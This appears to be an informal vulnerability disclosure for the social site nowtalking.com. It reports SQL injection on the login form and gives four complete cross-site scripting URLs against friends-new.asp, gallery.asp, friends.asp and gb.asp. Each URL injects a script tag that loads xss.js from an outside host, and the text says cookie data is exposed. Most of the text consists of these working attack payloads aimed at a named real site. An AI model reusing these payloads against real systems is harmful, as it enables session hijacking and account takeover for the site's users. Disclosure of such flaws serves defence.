Nowtalking.com Homepage: http://www.nowtalking.com Effected files: input boxes of logging in and searching friends-new.asp gallery.asp friends.asp gb.asp JET DB error due to injection: Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'UserName = '' or ''''. /login.asp, line 61 --------------------------------------- Friends-New.asp XSS vulnerability: It seems our cookie data is output on the screen via this XSS vuln: http://www.nowtalking.com/login/friends-new.asp?friendname=<script%20src=http://www.youfucktard.com/xss.js></script>&friendnumber=9 Screenshot: http://www.youfucktard.com/xsp/nt1.jpg -------------------------------------- Gallery.asp XSS vulnerability, this time by changing the usernumber to a negative #: http://www.nowtalking.com/login/gallery.asp?username=[script src=http://www.youfucktard.com/xss.js]</script>&usernumber=-78 Screenshot:http://www.youfucktard.com/xsp/nt2.jpg ----------------------------------- Friends.asp XSS Vuln, again with changing usernumber to a negative: http://www.nowtalking.com/login/friends.asp?usernumber=-9&username=<script%20src=http://www.youfucktard.com/xss.js></script> Screenshot: http://www.youfucktard.com/xsp/nt3.jpg ---------------------------------- Gb.asp XSS Vulnerability: http://www.nowtalking.com/login/gb.asp?username=<script%20src=http://www.youfucktard.com/xss.js></script>&usernumber=-9 Screenshot: http://www.youfucktard.com/xsp/nt4.jpg -----------------------------------
